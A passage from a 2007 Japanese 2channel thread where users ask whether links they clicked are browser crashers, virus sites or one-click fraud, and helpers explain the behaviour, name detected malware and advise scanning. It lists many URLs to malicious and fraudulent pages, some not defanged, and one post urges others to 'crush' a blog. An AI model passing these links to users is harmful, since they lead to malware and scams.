668 :名無しさん@お腹いっぱい。:2007/01/05(金) 12:20:56 ID:WivsBDHm0
tp://www.mayhem.net/juke/bodiesbeat1.html
↑mp3大量 無料

こっちです・・
273名無しさん@お腹いっぱい。:2007/01/27(土) 13:24:27
>>272
変な生き物の画像ウィンドウが音付きで飛び回る
ttp://cyberdyne-co-ltd.hp.infoseek.co.jp/burakura-11-20.html
の標本No.12

踏んでも特に害は無いよ。Alt+F4 で脱出
274名無しさん@お腹いっぱい。:2007/01/27(土) 13:48:04
>>273
ありがとうございました!
275名無しさん@お腹いっぱい。:2007/01/27(土) 15:13:08
>>268
レスありがとうございます。

定義期限切れですがスキャンで問題なかったので、
解決したことにします。

276名無しさん@お腹いっぱい。:2007/01/27(土) 21:27:26
http://gazo-xxx.com/entry.html
これって詐欺?
277名無しさん@お腹いっぱい。:2007/01/27(土) 22:27:10
ワンクリ詐欺だね
ttp://gazo-xxx.com/index.html
ここで「同意」するとそのページに飛ぶ

ページ閉じても復活する所が鬱陶しい
278名無しさん@お腹いっぱい。:2007/01/27(土) 23:28:28
http://tv10.2ch.net/test/read.cgi/cm/1154007132/
これは何でしょうか?
279名無しさん@お腹いっぱい。:2007/01/27(土) 23:32:14
??
2ちゃんねるのスレッドでしょ?
280名無しさん@お腹いっぱい。:2007/01/28(日) 05:11:54
踏んじゃいました・・・情けない・・・うぅぅ
↓のダウンロードって書いてあるところのリンクです。
tp://kasamatusan.sakura.ne.jp/cgi-bin2/src/ichi72163.jpg.html


html見てみたんですけどこれかな?↓
tp://s15.j-a-net.jp/gateway/click.cgi?a=62524&d=66939&u=
御願いしますm( __ __ )m
281名無しさん@お腹いっぱい。:2007/01/28(日) 05:18:21
>>280に追記

>>3の一種でしょうか?メディアプレーヤーやtelnetを起動
Outlookに変なニュースグループを作成まで一緒で、最後に音が大音量でした

OSアップデータはしてあります。
ウィルス対策ソフトはウイルスセキュリティーZeroです。
282名無しさん@お腹いっぱい。:2007/01/28(日) 05:55:31
>>280-281
ページタイトル「WELCOME」だから内容は>>171と同じもの
対処法は>>175

「最後に音が大音量でした」は元ブラクラサイトに置いてあるフラッシュ
>>175の2)かと

有害といえば有害だがまぁ問題無いかと思われ
心配なら一時ファイル削除して適当なウイルススキャン
http://pc10.2ch.net/test/read.cgi/sec/1167048038/8
283名無しさん@お腹いっぱい。:2007/01/28(日) 06:14:37
>>282
ありがとうございますm( __ __ )m

現在VSでのスキャンが完了、感染なし
久しぶりにシマンテックのオンラインスキャンを実行してみたところ
半分スキャンした時点で4個詳細は今のところ不明です。
VSのクオリティーには驚かされます。
284280:2007/01/28(日) 06:37:57
VSで引っかからなかった奴をシマンテックオンラインスキャンで
やってみた結果です。感染は全てgikonaviのdatファイルでした

ウイルス名はWScript.KakWormが3つとVBS.Freelink.B が1つ
これはもしかして、datファイル内にウイルスコードが残ってるって事?

datファイル消したらおkかしら?
285名無しさん@お腹いっぱい。:2007/01/28(日) 06:44:52
あ、すいません上のなしでw
ググったらわかりますた
286名無しさん@お腹いっぱい。:2007/01/30(火) 19:56:11
これ踏んじゃいました。
http://smart.45.kg/loveodagiri/garally/

AVG Free Edition で2個のファイルが隔離されましたが
その後いきなり再起動がかかりました。

AVGでフルスキャンすると
Boot Sector of Drive C が Changed と表示されました。

一応回復コンソールから fixmbr fixboot をやりました。
他にやっておくべきことはありますでしょうか?
287名無しさん@お腹いっぱい。:2007/01/30(火) 22:14:34
>>286
もう消えてるな…
残っていた時は確か>>267辺りとほぼ同内容だったかな

Update怠ってなければ、この類のものを踏んで深刻な状態になる事は
ほぼ無いと思うが…

とりあえず念の為もう一度スキャンかな
http://pc10.2ch.net/test/read.cgi/sec/1167048038/8
288286:2007/01/30(火) 22:28:59
ありがとうございます。そこにあるやつをかけてみます。
289名無しさん@お腹いっぱい。:2007/01/31(水) 01:59:06
ttp://www.amadorasweb.com/

これ踏んじゃいました
なんかたくさんページが出てきたんですが大丈夫でしょうか?
290名無しさん@お腹いっぱい。:2007/01/31(水) 02:44:48
>>289
呼び出されるサイトがある程度ランダムなので
確実な事は言えないけど、踏んでみた範囲では
即危険性のあるサイトには当たらなかった

ただどっちにしろまともなサイトだとも思えんので
心配なら適当なウイルススキャンはしておいて損は無いかと
(特に開いたページの、どこかリンクを踏んでしまったとかならなおさらの事)

使用ブラウザがIE6以前なのかな?ポップアップブロックのあるブラウザなら
収拾がつかないって事態にはならなかったと思うけど
291名無しさん@お腹いっぱい。:2007/02/01(木) 02:32:32
tp://up2.viploader.net/pic/src/viploader404501.jpg
AVG Free7.5.432で何もないって出たんですが、
単にJPG偽装のGIFで、精神的なものだけでしょうか?
292名無しさん@お腹いっぱい。:2007/02/01(木) 03:34:43
普通のサイトに行ってみたらウィンドウが大量に表示続けました。
なんとか止めてウイルススキャンしたんですが何もなし。
で、また同じサイトに行ったんですが今度は普通に見れました。

これってそのサイトがヤバいのかそれとも自分のパソコンがハッキング受けてイタズラされたのでしょうか?
293名無しさん@お腹いっぱい。:2007/02/01(木) 03:42:51
tp://members.jcom.home.ne.jp/i-am-a-student-boy/begin.htm

これなんでしょう?そのあとの書き込みにワロタとか書いてあったんですが
ポップアップブロックが働きました。鑑定お願いします。
294名無しさん@お腹いっぱい。:2007/02/01(木) 04:23:06
>>291
ただのgifだね。問題無し

>>292
普通のサイト…って言われても。URLとかの情報が無いと何とも
普通は特定のPCにウィンドウを大量に開くよう仕向ける、なんてハッキングは無いと思うよ

>>293
ネタサイトの一種で、「Windows2010」とでも呼べばいいのかな
「ローディング」が終わった後、ポップアップで開かれるのは
ttp://members.jcom.home.ne.jp/i-am-a-student-boy/main.htm になる

古いサイトにはポップアップブロックを考慮していない所もあったり
サイト自体は問題無しかと
295293:2007/02/01(木) 04:30:29
>>294
ネタサイトでしたか・・なんだかレジストリとか出てたので怖かったです。びびりました。
レス来るのを本当に待ってました。ありがとうございます。
キャッシュ消して、ウィルススキャン今やってます。このスレの方には本当に助かってます。
ありがとう。
296291:2007/02/01(木) 11:08:20
>>294
ありがとうございます

衝撃が頭から離れない(^^;;
297名無しさん@お腹いっぱい。:2007/02/03(土) 13:04:27
http://dailynews.7p.com/sports/baseball/professional/osa-20070203-000018.html

今日、これ踏んでメールとデータが吹っ飛んでしまったんですが、
これってどんな種類の物か分かりますか?
298名無しさん@お腹いっぱい。:2007/02/03(土) 14:01:02
ttp://www.110kz.com/003/virus.html
これについてお願いします・・・
299名無しさん@お腹いっぱい。:2007/02/03(土) 19:53:44
>>297
中身はもう消えてる
多分例のごとくニュースサイトのURLに見せかけてウイルスサイトを大量に
引っ張ってくるやつだったとは思うが

>>298
「ページが見つかりません」だった
そのページはもともと無かったか、サイト側で消したのかは分からないが
そこはジョークサイトなのでまぁPCに悪さをするような事は無いはず
300名無しさん@お腹いっぱい。:2007/02/04(日) 02:47:57
301名無しさん@お腹いっぱい。:2007/02/04(日) 03:40:58
>>295
削除されて今はただのgif
トロイを踏んだ恐れあり
302名無しさん@お腹いっぱい。:2007/02/04(日) 12:58:30
>>293
H"さんのサイトじゃん。
303名無しさん@お腹いっぱい。:2007/02/04(日) 20:59:36
>>301
あのあと、McAfee、カスペルスキー、Ad-Awareでチェックしましたが何も検出されませんでしたよ
すべて、最新の状態に更新してのチェックですが。
304名無しさん@お腹いっぱい。:2007/02/05(月) 16:25:48
305名無しさん@お腹いっぱい。:2007/02/05(月) 16:32:00
>>304
FDDアタックとかはともかく、複数のウイルスサイトの呼び出しがある
OSないし使用ブラウザに穴があると感染も有り得る

一時ファイル削除してウイルススキャン
306名無しさん@お腹いっぱい。:2007/02/05(月) 17:18:11
>>305
サンクス
ウイルススキャンしたけど感染ファイルはありませんでした
踏んだ瞬間、パソコンがガタガタいったので怖くなってすぐに閉じました
307名無しさん@お腹いっぱい。:2007/02/05(月) 18:09:06
あとどんなウイルスかよかったら教えてください
308名無しさん@お腹いっぱい。:2007/02/05(月) 18:42:28
どんな、と言われても。とりあえずざっと反応があったのは
「Exploit.HTML.Mht」「Trojan-Downloader.Win32.Obfuscated.n」
「AdTool.Win32.MyWebSearch」「Trojan-Spy.Win32.Banker.cgh」
「VirTool.Win32.VB.af」「Email-Worm.Win32.Lentin.g」
「Trojan-Spy.Win32.Banker.bsh」

こんな所。ワームやらアドウェアやら色々
ただ、exeやscrの直リンクはアンチウイルスは反応するだろうが
ブラウザ越しで踏んでも即実行される訳でも無いから、それほど危ないものでも無い

穴ついて感染を狙う類のやつは面倒なので深く調べてない
そういうものは大抵感染したそばから他のマルウェアを次々と落としてくるだろうから
被害の程度が予測しづらい。おまけに比較的頻繁にソースが変えてくる

現実的には>>304とかを直接踏んで、ド糞重い海外の有害サイト全てがきっちり呼び出されて
感染まで至るかと問われれば…運も絡むのかね
309名無しさん@お腹いっぱい。:2007/02/05(月) 19:08:26
>>308
ありがとうございました
310名無しさん@お腹いっぱい。:2007/02/07(水) 06:35:46
ttp://www2.strangeworld.org/uedakana/
これ踏んじまった
どうなの?
311名無しさん@お腹いっぱい。:2007/02/07(水) 08:10:21
>>310
>>258辺りに出てるから見ておくれ
312名無しさん@お腹いっぱい。:2007/02/08(木) 01:32:44
ttp://up2.viploader.net/pic/src/viploader409088.jpg
踏んでしまった自分が悪いんだけど・・・
すげー頭にきた!!はりつけた奴許せん!
大丈夫なんでしょうか?
313名無しさん@お腹いっぱい。:2007/02/08(木) 04:02:15
>>312
tp://のようにもう1つtを削ってくれー
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A
とりあえずこのページ見て。オレはこれしかわからん
314名無しさん@お腹いっぱい。:2007/02/08(木) 06:33:25
ありゃ、もう消えちまったか
まぁ大方画像URLに見せかけたブラクラ+ウイルスサイトの呼び出しだろう

>>312
検出されたのが>>313のやつだけなら特に必要な措置は無いんだが…
心配なら一時ファイル削除して適当なウイルススキャン。何も出なければそれでおk
315312:2007/02/08(木) 14:45:36
>>313-314
どうも有り難うございます
一時ファイル削除してウイルススキャンしてみましたが特に異常はありませんでした。
調べて見ましたら、メールの窓が沢山開いたのでもしかしたらMailtoストームというものだったのかも?
.jpgだったんで、てっきり画像だと思ったのが落とし穴でした。  
316名無しさん@お腹いっぱい。:2007/02/10(土) 18:36:45
ttp://nexx.jp/crashme.html

これ踏んでしまいました。
当方、XPでNOD32、Zoneを入れております。
どちらも警告はありません。PCの調子も良いです。
何か問題はあるでしょうか?
317名無しさん@お腹いっぱい。:2007/02/10(土) 19:43:00
>>316
crashmeのコピーかな。本家の方は消えたかなり前に消えたんだけども
踏んでもシステム感染とかは無いので、脱出できたのなら特に問題は無いよ
318名無しさん@お腹いっぱい。:2007/02/10(土) 23:56:02
317
ウイルス感染したと思い、オンラインスキャンで調べておりました。
カスペで調べると、Worm.Win32.Antinny.ayに感染したと警告がでました。
調べると、どうやらWinny関連のウイルスのようなので、一安心してましたが・・
(Winnyは使ってないので)

その後感染ファイルを見ると、以前NOD32で検出し、隔離?されていたものに反応していただけのようでした。
念の為、ウイルスバスターのオンラインスキャンで調べてみると、問題なしだったのでほっとしたところです。

>踏んでもシステム感染とかは無いので、脱出できたのなら特に問題は無いよ

そうでしたか!。これで今日はぐっすり眠れます。
レス、有難うございました。
319名無しさん@お腹いっぱい。:2007/02/11(日) 03:04:24
320名無しさん@お腹いっぱい。:2007/02/11(日) 21:17:08
これなんかもちょっとずつ名前変えてあちこちに大量にコピーサイト作り、
キーワード設定して、引っかかる人を待っている悪質なやつだな。

信のブログ
ワープするのだ!
countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html

恒のブログ
ワープするのだ!
noishferry.blog82.fc2.com/blog-entry-11.html

修のブログ
ワープするのだ!
kutanired.blog83.fc2.com


ワープするのだ!
sophiawhite.blog76.fc2.com/blog-entry-2.html


諭のブログ
ワープするのだ!
viss12670508.blog88.fc2.com/blog-entry-12.html

勉のブログ
ワープするのだ!
kainkachua.blog68.fc2.com

弁護士恒の日記とブログ
ワープするのだ!
noishferry.blog82.fc2.com/blog-entry-13.html
321名無しさん@お腹いっぱい。:2007/02/13(火) 01:07:56
武板にこんなん貼られてた

178 名前:名無しさん@一本勝ち[sage] 投稿日:2007/02/12(月) 23:54:23 ID:PIMQ1kRw0
tp://www.110kz.com/003/virus.htm
こういう技があるんだなぁ〜、、
すごすぎる。
322名無しさん@お腹いっぱい。:2007/02/13(火) 05:58:37
既出
323名無しさん@お腹いっぱい。:2007/02/13(火) 14:03:56
tp://dailynews.7h.com/sports/baseball/20070212-000000261-chu.html

mac osx10.3
セキリュチイは何もしてませんでした
マックのアイコンがグルグルしたままなので
再起動しました
大丈夫でしょうか
324名無しさん@お腹いっぱい。:2007/02/13(火) 17:45:28
>>323
ページが消えてしまっている上にmacに関しては全くの門外漢なんだ
力になれずすまん

ページ内容が、この所頻出している
ニュースサイトに見せかけたブラクラ+ウイルスサイトだったなら
あれは大概がWindows(IE)前提みたいなものだから
感染はほとんど無いと思うんだが…

それでも心配なら適当なウイルススキャン…だが
mac対応のオンラインスキャンというとシマンテック(ノートン)
くらいしか思いつかん
325名無しさん@お腹いっぱい。:2007/02/13(火) 17:49:49
ありがとっす
あのURLでウイルスとはいやな世の中になったもんだ
326名無しさん@お腹おっぱい。:2007/02/13(火) 19:13:41
ここ潰してやってくださいhttp://blog.livedoor.jp/korockyuuki/
327名無しさん@お腹いっぱい。:2007/02/13(火) 22:58:37
> 401 名前:名無しさん@恐縮です[] 投稿日:2007/02/13(火) 22:05:38 ID:r4qssjOg0
>
>
> 契約未更改の中日・福留、中村紀入団報道に「真面目に野球やるのがあほらしくなりますね」
> ://newstoday.8m.com/sports/baseball/cd20070213-00000038-chu.html

newstodayと書いてあって今日の日付なので踏んでしまいました
328名無しさん@お腹いっぱい。:2007/02/13(火) 23:46:08
下のURLを踏んでしまいました・・・。
どうすればいいのか教えて下さい!


791 名前:ひよこ名無しさん :2007/02/11(日) 19:29:58 ID:sc0BYyZT
すみませんがお願いします。

ttp://sixxx.info/celebs.html

792 名前: ◆.vDUUxqvlE :2007/02/11(日) 19:42:25 ID:???
>>791
洋エロ系サイトに逝きます
閉じると悪質タイプの偽装インチキセキュリティ系ポップが開きます
AcroRd32.exe が起動しようとするので遮断
Trojan.Clicker.HTML.Agent をClamWinで検出
not-a-virus:Downloader.Win32.WinFixer.m をカスペで検出
PC有害
329名無しさん@お腹いっぱい。:2007/02/13(火) 23:46:51
ttp://sixxx.info/celebs.html

これ踏んでしまいました
ポップが大量に出てパニックです
どうしたらよいでしょうか…
330名無しさん@お腹いっぱい。:2007/02/13(火) 23:48:09
>328
完全にかぶったw
スマン
331名無しさん@お腹いっぱい。:2007/02/14(水) 09:01:53
>>327
すまんがページがもう消えてしまった。踏んだ時に黒い窓が沢山現れたり
勝手にOutlookが立ち上がるとかしたようなら、適当なウイルススキャンを

>>328-329
インチキセキュリティソフトサイトへの誘導が主な狙いの模様で
踏んで即感染、というサイトでは無いと思う

ポップアップで現れたサイトに騙されて何かインスコしてしまった場合は…
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
http://pc10.2ch.net/test/read.cgi/sec/1162464139/
332328:2007/02/14(水) 11:43:13
>331
トン!
インストールはしませんでした
大丈夫のようですかね、本当にありがとう
333名無しさん@お腹いっぱい。:2007/02/16(金) 22:14:12
tp://headlines.pwac.net/20070216-00000526-yom-soci.html

※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (3)
注意!ループタグを発見! (2)
危険!mailtoストームを発見! (410)
危険!FDDアタックを発見!(7)
危険!無限ループを発見! (2)
危険!ニュースストームを発見! (3)
危険!Telnetストームを発見! (3)
ブラクラチェックが終了しました。

↑な感じだそーですが特に危険ウイルス等はないと判断していいんでしょうか
334名無しさん@お腹いっぱい。:2007/02/17(土) 00:47:38
>>333 なにでしらべたのですか?
335名無しさん@お腹いっぱい。:2007/02/17(土) 07:01:27
>>333
ありゃ、404か。通報食らって消されたかな
SCOの判定部分がそれで本当に全部なら、問題無いが

※ インラインフレームタグを発見しました。
↑こんなの無かったかな?
いつも通りの手口なら、これでウイルスサイトを大量に呼び出すように
仕向けていたようだけど

サイトが生きているうちに踏んじゃったのなら
一応ウイルススキャンを
336名無しさん@お腹いっぱい。:2007/02/19(月) 02:09:12
tp://adserving.cpxinteractive.com/click,JyUgAInLAgDZhAMA4WMBAAAA.AEAAP8A.wD..wAABgOpWAIAHdIAANU8AgAAAAAAAAAAAAAAAAAAAAAAAAAAACaH2EUAAAAA,,http%3A%2F%2Fwww%2Emediafire%2Ecom%2F%3F6uwmw2mtdzy,

踏んでしまいました・・・
怪しげなポップアップが出て
その後一応スキャンしても何も出なかったんですけど
337名無しさん@お腹いっぱい。:2007/02/19(月) 03:08:53
日曜日の秘密基地って結構長寿番組だったのか

>>336
ランダム広告かな
懸賞とか儲け話とかの餌で個人情報の収集を図るとか、まぁそんな類の手合いかと思う
何回か確認した限りでは、踏んで即感染とかそういう悪質なのは無かった
開いた窓を地道に閉じていったのなら問題無いかと
338お願いします:2007/02/24(土) 13:53:33
>>316を私も先日踏んでしまいました。
どうすることも出来ずにPCを強制終了しました。
それから数日経ちますが、特にこれといった不具合が出ていないのですが、とても心配しています。
スキャン(PCのシステムツールの中にあるもの)はしましたが、エラーはありませんでした。
PC暦は長いのですが、こういったことには無頓着で初心者です。ご教示下さい。

PCはWindows MEです。

踏んだことで何か懸念されることを教えていただきたいのです。宜しくお願い致します。
339名無しさん@お腹いっぱい。:2007/02/24(土) 16:15:00
>>338
WinMeでも回答としては>>317と同様
強いて言うなら、踏んで終了できなくなったからといって
強制電源断とかやるとHDDに損傷を与える可能性はある

サイト自体は単なる嫌がらせの域を出ない程度のもの
340338:2007/02/24(土) 18:12:56
>>339
ありがとうございます。
そうですか・・ホッとしました。
こういったことは今までのネット生活の中では無縁の経験だったのですが、
2ちゃんをやるようになって、このスレを見てもこういうのが多いということに正直あたふたしております。

強制終了は良くなかったようですね。
ただ、最初は頭が真っ白になって「なになになにぃぃぃい〜〜!?!?」となってしまい、
なんとか閉じようとしてたのが20秒くらいでしょうか、無理だと悟り、強制終了してしまいました。

>踏んで終了できなくなったからといって強制電源断とかやるとHDDに損傷を与える可能性はある

どうすることが最良でしたでしょうか?無知でお恥ずかしいです。
どういう状態の画面が出てきたか今でも覚えていますが、本当に気持ち悪くて、本当にやめて欲しいです・・
でも、序の口で私の言ってることは笑われてしまうようなことでしたらお恥ずかしいですm(__)mすみません。
(踏んだ自分が悪いのですが。今後充分に気をつけます。)
341名無しさん@お腹いっぱい。:2007/03/02(金) 21:07:58
ちょいとアドレスにやられました><

ttp://www.mainichi-msn.itgo.com/shakai/jiken/news/20070302k0000e040055000c.jpg
342名無しさん@お腹いっぱい。:2007/03/02(金) 22:07:07
ttpも抜いて><
343名無しさん@お腹いっぱい。:2007/03/02(金) 23:29:26
tp://www.hamepara.com/index_333.php/?na=333
このページの再生を踏んでしまいました
344名無しさん@お腹いっぱい。:2007/03/03(土) 06:16:39
>>341
もうページが消えてるが、おおかた>>6の手口だろう
専ブラの画像ポップアップとかでは無く、直接踏んでしまったのなら
一時ファイル削除してウイルススキャン

>>343
ワンクリ詐欺サイト
何かを取得しているっぽい画像が色々出てきただろうが
全部こけおどしだ。徹底無視でいい
あわててこっちから連絡とか取らないように
345名無しさん@お腹いっぱい。:2007/03/03(土) 09:31:04
【使用OS】 windowsXP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】
フリーのavast、元から入ってるセキリュリティ対策ツール

【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】
トロイの木馬、マルウェア? ファイルに感染してる

【別のオンラインスキャンしたならその結果は】
昨夜、avastでトロイ、他を感知。
推奨でチェストに移動しました。
今朝、セキュリティ対策ツールを実行してみたところ
何も検出されませんでしたが、心配でその後、
avastでスキャンしたらまたトロイが2つ発見

【症状を具体的に、分かる限りすべて書く】
今のところ何もありません。
URLを踏んだ時に勝手にDLさせようとしてきたので再起動..

【何をしたらそんなことになったのか】 http://www.mainichimsn.itgo.com/shakai/jiken/news/20070302k0000e040055000c.jpgを踏んでからです
そのスレの鑑定人さんにはavast使えばあまり問題はない、
と言っていました。

【これまでにとった措置】
駆除、隔離。

【その他の質問】
このままうまく駆除出来なかった場合どう対処すればいいか
いいかわかりません。 よろしくお願いします。
346名無しさん@お腹いっぱい。:2007/03/03(土) 09:37:20
そういえばワンクリック詐欺で意見投稿フォームを設置していた
馬鹿サイトがあったね
「ばーーーーーーーーかwwwwwwwwww」と送っておいたが、今はもうそのサイトは無いんだよなw
347名無しさん@お腹いっぱい。:2007/03/03(土) 09:46:26
>>345
>【スキャンした結果(ウイルス名・発見場所)】
ウイルスの発見場所は、PCがマルウェアに感染しているのか
それとも一時ファイルに反応しているだけなのか判別するのに必要な情報なので
なるべく明記の事

件のURLは少し上にもある通り、もう消えてる
WindowsUpdateを怠ってなければ、通常サイトを閲覧しただけで感染する事態は
そうそう無い

心配なら各社のオンラインスキャンなど
http://pc11.2ch.net/test/read.cgi/sec/1171809750/9
348名無しさん@お腹いっぱい。:2007/03/03(土) 17:04:58
http://www.sanspo.itgo.com/geino/top/gt200703/gt2007030303.html

これを踏んじゃったんですけど、どうすればいいですか?
349名無しさん@お腹いっぱい。:2007/03/03(土) 17:12:15
インターネット一時ファイルを全て削除
350名無しさん@お腹いっぱい。:2007/03/03(土) 17:52:42
これはまだ消えてないのか
…呼び出し先が60ヶ所以上に増えてる

>>348
WindowsUpdateの状態と踏んだ時に呼び出したサイトによっては
感染も有り得るので、心配なら>>349やって適当なウイルススキャン
351345:2007/03/03(土) 18:10:56
345です。
何回駆除、削除してもトロイが感知されます。
アバストで隔離、削除したのですが・・・。

知り合いの詳しい方に見ていただいたところ、
隔離、削除でおkとの事だったのですが、
今セキュリティ対策ツールでスキャン中ですが
スパイウェア&ウイルス合わせて
20いくつ感知されてるみたいです。

どこに感染してるかはどこを見ればわかりますか??
今危険な状態ですよね?!

優しい方アドバイスお願いします。
何度もすみません。
352名無しさん@お腹いっぱい。:2007/03/03(土) 18:22:15
>>348
俺もこれさっき踏んでしまった
nodでトロイ3種類の警告出たよ
353名無しさん@お腹いっぱい。:2007/03/03(土) 18:51:27
>>348
私もこれを踏んでしまい報告しにここに来ました。
トロイなのか・・・最悪

とりあえずインターネット一時ファイルを削除してAhnLabの「マイシールド」という
ソフトで検索したけど何も出てきませんでした。
それでもまだ不安です。どうすればいいでしょうか?

使用OSはWinXPHOME-SP2、Windowsupdateはやってます。
Antivirusは上記の「マイシールド」を使ってます。
354名無しさん@お腹いっぱい。:2007/03/03(土) 19:08:54
>>351
avast使ったこと無いからよくわからんが
スキャン中・後に出るこういう画面
ttp://ratan.dyndns.info/avast4/buhin/virsscan1.png
ttp://ratan.dyndns.info/avast4/buhin/0osirasescan11.png

とりあえず感染の目星をつけるために、その画面に表示された
ファイルパスが必要
(C:\WINDOWS\system32〜うんぬんとか)

>>353
何も出てこなければそれに越した事は無いのだけど
それでも心配ならセカンドオピニオンに頼る他無い
各社オンラインスキャンなど
http://pc11.2ch.net/test/read.cgi/sec/1171809750/
355るんた:2007/03/03(土) 19:20:45
えっと古いPCからノートPCにしたのですが最近のなのでセキュリティが
高くなっていて以前のPCで入っていたチャットが入れなくなってしまい
入ろうとすると セキュリティ保護のため、このサイトによるこの
コンピュータによるActiveXコントロールのインストールがInternet Explorerに
より停止されましたとなってしまうのですがどうすればいいのでしょうか・・?
356名無しさん@お腹いっぱい。:2007/03/03(土) 19:21:47
>>348はトロイなのか?すぐ閉じたけどTrojan.JS.Windowbomb.gしか検出しなかったぞ
357るんた:2007/03/03(土) 19:22:27
人のスレにかきこんでしまってすいませんでした;;。
358名無しさん@お腹いっぱい。:2007/03/03(土) 19:33:53
>>356
Windowbombを検知した段階で悪サイトの呼び出しを防いでいるのかも知れん
そこら辺は使用アンチウイルスの挙動による

>>348の作成者は、とりあえず既知のブラクラと有害そうなURLを
ありったけ放り込んでるだけで、各サイトの生存とか、ブラクラが発動した上で
悪サイトの呼び出しまできっちり行われるのか、とかいう所は恐らくいちいち確認していない
359名無しさん@お腹いっぱい。:2007/03/03(土) 21:28:58
>>356
トロイの英単語覚えてこい
360343:2007/03/03(土) 23:24:05
>>344
遅くなりましたがありがとうございました。
361名無しさん@お腹いっぱい。:2007/03/04(日) 00:08:15
>>354
アドバイスありがとうございます。
さっきAhnLab V3のウィルスログを見たら、踏んだ直後に
Win-Trojan/Exploit-WMF.Gen
というのを検出・削除してました。
これはちゃんとAntivirusソフトが機能していると考えていいですよね?
362名無しさん@お腹いっぱい。:2007/03/04(日) 02:47:42
>>348
サンスポの記事かと思い踏んだところ
error 404というページに出て、すぐに消したんですがその後のスレで
菌とかトロイとか書かれていてすごく不安です。
PCはmacXです。どうすればよいのか教えてほしいです。
363名無しさん@お腹いっぱい。:2007/03/04(日) 02:55:41
macOSXは完全にUNIX系OSだし、自動感染はあまり心配しなくていいと思う。
364名無しさん@お腹いっぱい。:2007/03/04(日) 03:22:39
>>363
362です。早速お答えいただきありがとうございます。
無知ですいません。自動感染以外に感染方法があるのでしょうか?
365名無しさん@お腹いっぱい。:2007/03/04(日) 03:43:04
実行形式のファイルがそのまま落ちてくる事があるので
それを誤って走らせてしまうと危険かも知れん

が、件のページはあなたが踏んだタイミングの時には
既に消えている(404)ので心配しなくていい
366名無しさん@お腹いっぱい。:2007/03/04(日) 04:03:08
>>365
そうですか…安心しました。
安易に踏んでしまったので気をつけます。
ありがとうございました。
367名無しさん@お腹いっぱい。:2007/03/04(日) 18:52:09
ブラクラでウイルスに自動感染させられない
為の選択肢としてmacOS XやLINUX、BSDなど
を導入するってのはあるな。
368名無しさん@お腹いっぱい。:2007/03/04(日) 20:13:42
最近芸スポでブラクラ貼る奴がいるね・・・
初心者がやたらひっかかってウイルススレになっとるよ
369名無しさん@お腹いっぱい。:2007/03/04(日) 22:15:49
芸スポ板は行った事が無かったが
テキトーに開いたスレにいきなり貼ってあった

一応人の集まりそうなスレ狙って爆撃してるのかね

>>368
件のサイトの作成者はそういった反応見て楽しんでるんだろうな
370名無しさん@お腹いっぱい。:2007/03/04(日) 22:22:07
芸スポだけじゃないな
最近ブラクラ貼ってる奴大杉
371名無しさん@お腹いっぱい。:2007/03/06(火) 01:52:46
Operaでここを開くと印刷プロパティが表示されるのですが
これはブラクラとは違うのでしょうか?
www.desktopcustomize.com/modules/windows4/content/index.php?op=print&id=8

調査をお願いします。
372名無しさん@お腹いっぱい。:2007/03/06(火) 03:42:38
>>371
IEで開いても同様だね
ソース内に window.print() があるので、スクリプトの走る環境なら
多分どのブラウザでも印刷するかどうか訊いてくると思う

動作としては適当なページで Ctrl+P した時と同じはず

サイト内のどこに貼られたリンクか分からないけど
文字通りページを印刷するためのものとして設置されたのだと思う
悪意は無いと思うよ
373名無しさん@お腹いっぱい。:2007/03/06(火) 15:23:45
>>372
どうも。
メール作成画面を勝手に開いたり、印刷プロパティを勝手に開いたり
この手の問題は心臓に悪いですね。

ブラウザ側でこの辺の動作をユーザー側で停止できたら良いのに
と思います。
374名無しさん@お腹いっぱい。:2007/03/06(火) 16:02:36
p://www.vipper.net/vip192711.jpg.html
ニュー即から踏みました。
375名無しさん@お腹いっぱい。:2007/03/06(火) 16:39:12
実際の拡張子はhtm
有害サイトを力いっぱい読み込みます
mailtoスト―ム、conconあり
ダイアラー、スパイウェアもあり
376名無しさん@お腹いっぱい。:2007/03/06(火) 16:43:54
>>374
トロイも検出
377名無しさん@お腹いっぱい。:2007/03/08(木) 10:21:38
ノートン2007でスキャンしてたら、スキャンファイル名「滝川クリトリス」なるものが見えました。
ノートンはスルーですが、ググるとウイルスのように書いてあります。
とりあえずファイル検索で『滝川クリトリス』を調べましたが引っかかるものはありませんでした。
これはウイルスなんですかね。
378名無しさん@お腹いっぱい。:2007/03/08(木) 10:38:00
>>377
セキュリティ初心者質問スレッドpart83
http://pc11.2ch.net/test/read.cgi/sec/1172142802/l50
379名無しさん@お腹いっぱい。:2007/03/08(木) 10:51:19
>>378
サンクス
380名無しさん@お腹いっぱい。:2007/03/10(土) 01:50:11
専ブラにまとめてブラクラを登録したいんだけども、まとめサイトとかないもんですかね?
381名無しさん@お腹いっぱい。:2007/03/10(土) 02:54:52
tp://webftp.athuman.com/~haa470045/onc/re/index.php

PCにて踏んでしまいました…。
なんかVIP銀行一億振り込め的なメッセージが出るんですが、これはイタズラですよね?
ただその直後何かが勝手にインストールされたようで不安でしかたがありません…。

環境はXPのSP2
ブラウザはスレイプニル。
SpybotとAdAwareSEとウイルスバスター2006を使って検索しましたが何も見つかりませんでした…。
ちなみに3ソフトとも数時間前に更新したばかりです。

これは一体なんなんでしょうか?
382名無しさん@お腹いっぱい。:2007/03/10(土) 03:42:22
>>381
URLに書いてある通りワンクリ詐欺サイトを模した
ジョークサイトだろう
IPとホストは抜かれるが、ざっと見サイト内にPCに悪さをするような仕掛けは無い

>ただその直後何かが勝手にインストールされたようで不安でしかたがありません…。
この「画像」の事かな
ttp://webftp.athuman.com/~haa470045/onc/re/img/da02.gif


まぁもしかしたら世の中にはVIP銀行YAHOO支店を探し出して一億払う奇特な方も居るかも知れん
383名無しさん@お腹いっぱい。:2007/03/10(土) 07:46:45
>>382
え゛、画像でしたか…。
一度スパイウェアを仕込まれた時とそっくりだったんでビビってましたorz
さすがに画像だとは思いもしませんでした
とりあえず安心してよいようなので、寝ようかと思いますw
なんか無駄に疲れました、精神的に。

では、ありがとうございました。
384名無しさん@お腹いっぱい。:2007/03/11(日) 00:17:06
tp://vipup.sakura.ne.jp/512kb/src/512kb_7856.jpg
ニュー速から踏みますた。
怪しいファイルを実行するスレッドとどちらに書くべきか良く分かりませんが・・・・ブラクラも含んでいます。
